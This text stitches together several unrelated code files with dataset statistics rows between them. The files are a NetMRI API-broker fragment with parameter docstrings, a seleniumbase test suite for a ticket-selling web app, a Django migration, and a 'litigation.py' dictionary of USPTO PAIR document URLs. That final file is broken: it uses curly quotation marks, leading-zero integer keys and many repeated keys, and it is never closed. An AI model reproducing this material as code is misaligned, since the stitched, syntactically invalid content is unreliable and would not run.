:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` PolicyRuleID
:param sort: The data field(s) to use for sorting the output. Default is PolicyRuleID. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each EffectivePolicyRule. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return effective_policy_rules: An array of the EffectivePolicyRule objects that match the specified input criteria.
:rtype effective_policy_rules: Array of EffectivePolicyRule
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
    """Return the collector NetMRI (DataSource) that collected this record.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
    :type PolicyRuleID: Integer

    **Outputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :return : The collector NetMRI that collected this data record.
    :rtype : DataSource
    """
    # Resolve the broker-qualified method name once, then dispatch.
    method_name = self._get_method_fullname("data_source")
    return self.api_request(method_name, kwargs)
def devices(self, **kwargs):
    """Return the devices against which this policy rule was evaluated.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
    :type PolicyRuleID: Integer

    **Outputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :return : The devices against which this rule was evaluated.
    :rtype : Device
    """
    # Resolve the broker-qualified method name once, then dispatch.
    method_name = self._get_method_fullname("devices")
    return self.api_request(method_name, kwargs)
def policy_rule_set_filter_text(self, **kwargs):
    """Return a human-readable text version of the policy rule set filter.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
    :type PolicyRuleID: Integer

    **Outputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :return : Returns a human-readable text version of the policy rule set filter.
    :rtype : String
    """
    # Resolve the broker-qualified method name once, then dispatch.
    method_name = self._get_method_fullname("policy_rule_set_filter_text")
    return self.api_request(method_name, kwargs)
def policy_rule_rule_logic_text(self, **kwargs):
    """Return a human-readable text version of the policy rule logic.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None

    :param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
    :type PolicyRuleID: Integer

    **Outputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :return : Returns a human readable text version of the policy rule logic.
    :rtype : String
    """
    # Resolve the broker-qualified method name once, then dispatch.
    method_name = self._get_method_fullname("policy_rule_rule_logic_text")
    return self.api_request(method_name, kwargs)
| 54.75019
| 811
| 0.627632
| 8,282
| 72,106
| 5.40739
| 0.039483
| 0.066988
| 0.043542
| 0.071275
| 0.95121
| 0.94862
| 0.912714
| 0.900835
| 0.891524
| 0.889961
| 0
| 0.004025
| 0.293596
| 72,106
| 1,317
| 812
| 54.75019
| 0.875196
| 0.825673
| 0
| 0
| 0
| 0
| 0.079243
| 0.053296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.421053
| false
| 0
| 0.052632
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
156a6174b3113dfae726a220c11c55dfb25687ba
| 10,575
|
py
|
Python
|
qa327_test/frontend/test_sell.py
|
llim1/SeetGeek-CMPE327
|
6d49b9c6bd9e67dd747584a7b2109d69ae4c6c96
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_sell.py
|
llim1/SeetGeek-CMPE327
|
6d49b9c6bd9e67dd747584a7b2109d69ae4c6c96
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_sell.py
|
llim1/SeetGeek-CMPE327
|
6d49b9c6bd9e67dd747584a7b2109d69ae4c6c96
|
[
"MIT"
] | 1
|
2021-01-02T16:36:17.000Z
|
2021-01-02T16:36:17.000Z
|
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User, Ticket
from werkzeug.security import generate_password_hash, check_password_hash
# Testing components
# Mock user used by every test in this module (password is pre-hashed so the
# login form's check_password_hash succeeds against 'Testing!').
test_user = User(
    email='testing@test.com',
    name='Test',
    password=generate_password_hash('Testing!'),
    balance=5000
)

# A fully valid ticket, for the happy-path cases.
test_ticket = Ticket(
    name='test ticket yo',
    quantity='10',
    price='10',
    expiration_date=20201201
)

# R4.1 fixtures — invalid names.
invalid_ticket_name1 = Ticket(
    name='@testTicket',        # non-alphanumeric character
    quantity='10',
    price='10',
    expiration_date=20201201
)
invalid_ticket_name2 = Ticket(
    name=' testTicket',        # leading space
    quantity='10',
    price='10',
    expiration_date=20201201
)
invalid_ticket_name3 = Ticket(
    name='testTicket ',        # trailing space
    quantity='10',
    price='10',
    expiration_date=20201201
)
invalid_ticket_name4 = Ticket(
    name='testTicketxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx',  # > 60 chars
    quantity='10',
    price='10',
    expiration_date=20201101
)

# R4.3 fixtures — invalid quantities (must be in (0, 100]).
invalid_ticket_quantity1 = Ticket(
    name='testTicket',
    quantity='0',              # below range
    price='10',
    expiration_date=20201101
)
invalid_ticket_quantity2 = Ticket(
    name='testTicket',
    quantity='101',            # above range
    price='10',
    expiration_date=20201101
)

# R4.4 fixtures — invalid prices (must be in [10, 100]).
# BUG FIX: the original defined `invalid_ticket_price2` twice (the first
# assignment was silently shadowed) and both copies had a *valid* price of
# '10' with an invalid quantity — a copy-paste of the quantity fixtures.
invalid_ticket_price1 = Ticket(
    name='testTicket',
    quantity='10',
    price='9',                 # below range
    expiration_date=20201101
)
invalid_ticket_price2 = Ticket(
    name='testTicket',
    quantity='10',
    price='101',               # above range
    expiration_date=20201101
)
# Test case R4.1 - The name of the ticket has to be alphanumeric-only, and space
# allowed only if it is not the first or last character
class TestCase4_1(BaseCase):
    """R4.1 — the ticket name must be alphanumeric-only; a space is allowed
    only when it is not the first or last character."""

    def _sell_ticket(self, name, quantity, price, expiration_date):
        # Log in as the mocked test user and submit the sell form once.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "testing@test.com")
        self.type("#password", "Testing!")
        self.click('input[type="submit"]')
        self.get_element('#sell_form').click()
        self.type("#name", name)
        self.type("#quantity", quantity)
        self.type("#price", price)
        self.type("#expiration_date", expiration_date)
        self.click('input[type="submit"]')

    # Test Case R4.1.1 - Non-alphanumeric
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_1_1(self, *_):
        self._sell_ticket("@testTicket", "10", "10", "20201201")
        self.assert_text("Ticket Name must be alphanumeric")

    # Test Case R4.1.2 - First character is a space
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_1_2(self, *_):
        self._sell_ticket(" testTicket", "10", "10", "20201201")
        self.assert_text("Ticket Name must not include a space at the beginning")

    # Test Case R4.1.3 - Last character is a space
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_1_3(self, *_):
        self._sell_ticket("testTicket ", "10", "10", "20201201")
        self.assert_text("Ticket Name must not include a space at the end")
# Test case R4.2 - The name of the ticket is no longer than 60 characters
class TestCase4_2(BaseCase):
    """R4.2 — the ticket name must be no longer than 60 characters."""

    # Test Case R4.2 - 61-character name is rejected.
    # BUG FIX: the method was misnamed `testcase4_3` (copy-paste from the
    # next class); renamed to match this class's requirement number.
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_2(self, *_):
        # Log in as the mocked test user.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "testing@test.com")
        self.type("#password", "Testing!")
        self.click('input[type="submit"]')
        # Submit the sell form with a 61-character name.
        self.get_element('#sell_form').click()
        self.type("#name", "testTicketxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
        self.type("#quantity", "10")
        self.type("#price", "10")
        self.type("#expiration_date", "20201201")
        self.click('input[type="submit"]')
        self.assert_text("The name of the ticket must be no longer than 60 characters")
# Test case R4.3 - The quantity of the tickets has to be more than 0, and less than or equal to 100
class TestCase4_3(BaseCase):
    """R4.3 — the ticket quantity must be more than 0 and at most 100."""

    def _sell_ticket(self, name, quantity, price, expiration_date):
        # Log in as the mocked test user and submit the sell form once.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "testing@test.com")
        self.type("#password", "Testing!")
        self.click('input[type="submit"]')
        self.get_element('#sell_form').click()
        self.type("#name", name)
        self.type("#quantity", quantity)
        self.type("#price", price)
        self.type("#expiration_date", expiration_date)
        self.click('input[type="submit"]')

    # Test Case R4.3.1 - 0 quantity
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_3_1(self, *_):
        self._sell_ticket("testTicket", "0", "10", "20201201")
        self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.")

    # Test Case R4.3.2 - 101 quantity
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_3_2(self, *_):
        self._sell_ticket("testTicket", "101", "10", "20201201")
        self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.")
# Test case R4.4 - Price has to be of range [10, 100]
class TestCase4_4(BaseCase):
    """R4.4 — the ticket price must be in the range [10, 100]."""

    def _sell_ticket(self, name, quantity, price, expiration_date):
        # Log in as the mocked test user and submit the sell form once.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "testing@test.com")
        self.type("#password", "Testing!")
        self.click('input[type="submit"]')
        self.get_element('#sell_form').click()
        self.type("#name", name)
        self.type("#quantity", quantity)
        self.type("#price", price)
        self.type("#expiration_date", expiration_date)
        self.click('input[type="submit"]')

    # Test Case R4.4.1 - Below 10 price
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_4_1(self, *_):
        self._sell_ticket("testTicket", "10", "9", "20201201")
        self.assert_text("Ticket Price cannot be less than 10")

    # Test Case R4.4.2 - Above 100 price
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_4_2(self, *_):
        self._sell_ticket("testTicket", "10", "101", "20201201")
        self.assert_text("Ticket Price cannot be more than 100")
# Test case R4.5 - Date must be given in the format YYYYMMDD
class TestCase4_5(BaseCase):
    """R4.5 — the expiration date must be given in the format YYYYMMDD."""

    def _sell_ticket(self, name, quantity, price, expiration_date):
        # Log in as the mocked test user and submit the sell form once.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "testing@test.com")
        self.type("#password", "Testing!")
        self.click('input[type="submit"]')
        self.get_element('#sell_form').click()
        self.type("#name", name)
        self.type("#quantity", quantity)
        self.type("#price", price)
        self.type("#expiration_date", expiration_date)
        self.click('input[type="submit"]')

    # Test Case R4.5.1 - Includes non-numeric characters
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_5_1(self, *_):
        self._sell_ticket("testTicket", "50", "15", "20/11/01")
        self.assert_text("Ticket Date must not include non-numeric characters")

    # Test Case R4.5.2 - Does not include 8 characters
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_5_2(self, *_):
        self._sell_ticket("testTicket", "50", "15", "2020111")
        self.assert_text("Ticket Date must be 8 characters long")
# Test case R4.6 - For any errors, redirect back to / and show an error message
class TestCase4_6(BaseCase):
    """R4.6 — on any validation error, redirect back to / and show an
    error message."""

    # Test Case R4.6 - Redirects back to / (welcome header is visible
    # alongside the validation error).
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_6(self, *_):
        # Log in as the mocked test user.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "testing@test.com")
        self.type("#password", "Testing!")
        self.click('input[type="submit"]')
        # Submit an invalid (non-alphanumeric) ticket name.
        self.get_element('#sell_form').click()
        self.type("#name", "@testTicket")
        self.type("#quantity", "10")
        self.type("#price", "10")
        self.type("#expiration_date", "20201101")
        self.click('input[type="submit"]')
        # Back on / : the profile header is rendered with the error text.
        self.assert_element("#welcome-header")
        self.assert_text("Ticket Name must be alphanumeric")
# Test case R4.7 - Add new ticket to user profile page
class TestCase4_7(BaseCase):
    """R4.7 — a successfully sold ticket appears on the user profile page."""

    # Test Case R4.7 - New ticket is listed on the profile page.
    # BUG FIX: the method was misnamed `testcase4_6` (clashing with the
    # previous class's test) and its comment was copy-pasted from R4.5.2;
    # renamed and re-documented to match this requirement.
    @patch('qa327.backend.get_user', return_value=test_user)
    def testcase4_7(self, *_):
        # Log in as the mocked test user.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "testing@test.com")
        self.type("#password", "Testing!")
        self.click('input[type="submit"]')
        # Submit a fully valid ticket.
        self.get_element('#sell_form').click()
        self.type("#name", "testTicket123")
        self.type("#quantity", "10")
        self.type("#price", "10")
        self.type("#expiration_date", "20221201")
        self.click('input[type="submit"]')
        # The new ticket must show up in the profile's ticket list.
        self.open(base_url + '/')
        self.assert_element("#tickets")
        self.assert_text("Name: testTicket123", "#tickets")
| 37.767857
| 109
| 0.62695
| 1,367
| 10,575
| 4.713972
| 0.111192
| 0.089385
| 0.046555
| 0.058194
| 0.786623
| 0.77126
| 0.765363
| 0.747052
| 0.747052
| 0.738982
| 0
| 0.052739
| 0.209267
| 10,575
| 280
| 110
| 37.767857
| 0.71789
| 0.095225
| 0
| 0.713115
| 0
| 0
| 0.319439
| 0.040427
| 0
| 0
| 0
| 0
| 0.057377
| 1
| 0.04918
| false
| 0.057377
| 0.02459
| 0
| 0.102459
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1593dbef4d83cc578ed51a12725d810353f9e782
| 1,974
|
py
|
Python
|
virtual/lib/python3.8/site-packages/account/migrations/0006_auto_20210413_0847.py
|
nimowairimu/My-neighborhood
|
23e66f221a0bc864dcc12309d02079dbfce6123c
|
[
"MIT"
] | null | null | null |
virtual/lib/python3.8/site-packages/account/migrations/0006_auto_20210413_0847.py
|
nimowairimu/My-neighborhood
|
23e66f221a0bc864dcc12309d02079dbfce6123c
|
[
"MIT"
] | null | null | null |
virtual/lib/python3.8/site-packages/account/migrations/0006_auto_20210413_0847.py
|
nimowairimu/My-neighborhood
|
23e66f221a0bc864dcc12309d02079dbfce6123c
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2021-04-13 08:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Convert the primary key of every `account` model to BigAutoField
    (the new DEFAULT_AUTO_FIELD introduced by Django 3.2)."""

    dependencies = [
        ('account', '0005_update_default_language'),
    ]

    # The same AlterField is applied to each model's `id` column, so build
    # the operation list from the model names instead of repeating it.
    operations = [
        migrations.AlterField(
            model_name=altered_model,
            name='id',
            field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        )
        for altered_model in (
            'account',
            'accountdeletion',
            'emailaddress',
            'emailconfirmation',
            'passwordexpiry',
            'passwordhistory',
            'signupcode',
            'signupcoderesult',
        )
    ]
| 36.555556
| 111
| 0.611449
| 196
| 1,974
| 5.979592
| 0.234694
| 0.081911
| 0.170648
| 0.197952
| 0.753413
| 0.753413
| 0.753413
| 0.753413
| 0.753413
| 0.753413
| 0
| 0.0125
| 0.270517
| 1,974
| 53
| 112
| 37.245283
| 0.801389
| 0.021783
| 0
| 0.680851
| 1
| 0
| 0.089684
| 0.014515
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.042553
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eca9b5b33d503a12351bf5c59458c22895b7ec16
| 27,864
|
py
|
Python
|
litigation.py
|
JessieSalas/WatsonApp
|
5837b9c091419d65c67c0556b14bff55ecd9ccc5
|
[
"MIT"
] | null | null | null |
litigation.py
|
JessieSalas/WatsonApp
|
5837b9c091419d65c67c0556b14bff55ecd9ccc5
|
[
"MIT"
] | null | null | null |
litigation.py
|
JessieSalas/WatsonApp
|
5837b9c091419d65c67c0556b14bff55ecd9ccc5
|
[
"MIT"
] | 1
|
2019-02-02T10:41:15.000Z
|
2019-02-02T10:41:15.000Z
|
litigation_dict={
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HU011X63PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU2HPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU31PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU39PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU3HPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU3QPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU41PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU49PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU4IPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU4RPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GSC19LA7PPOPPY5&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GLAZVS1BPPOPPY5&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GLB0W3AZPPOPPY5&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKSOXRXBPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKSOXS17PPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKSOXS1PPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEDPPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEEGPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEF5PPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEJ5PPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEJLPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEKRPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYELPPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYENHPPOPPY2&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FZ5K2KJRPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FYRJ5AUKPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FR5MPDSJPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FR5MPDTUPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FOSR13LBPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FOSR13MNPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FOSR13O1PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FQAYKOAKPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FMVVYCXTPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FMKMLTFXPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6AKPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6C1PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6CDPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6CYPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6DAPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6DMPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FE30UU03PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FJJX78X4PPOPPY2&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N03PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N59PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N5LPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N66PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NBAPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NC2PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NCPPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NGCPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NY6PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NYTPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NZ5PPOPPY5&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HMB8U5MOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HM16TXJ9PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HL9QTDVUPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HL9QTDWOPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HL9QTDWVPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HKMJV36APXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HKMJV36IPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HKMJV36QPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFUGPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFV0PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFV8PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFVGPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFVPPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFVXPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFWFPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFWNPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFWVPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFX2PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFXAPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFXIPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFXQPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFYBPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFYJPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFZMPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFZUPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HD7PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HE9PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HEHPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HEOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HEWPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HF4PXXIFW4&lang=DINO”,
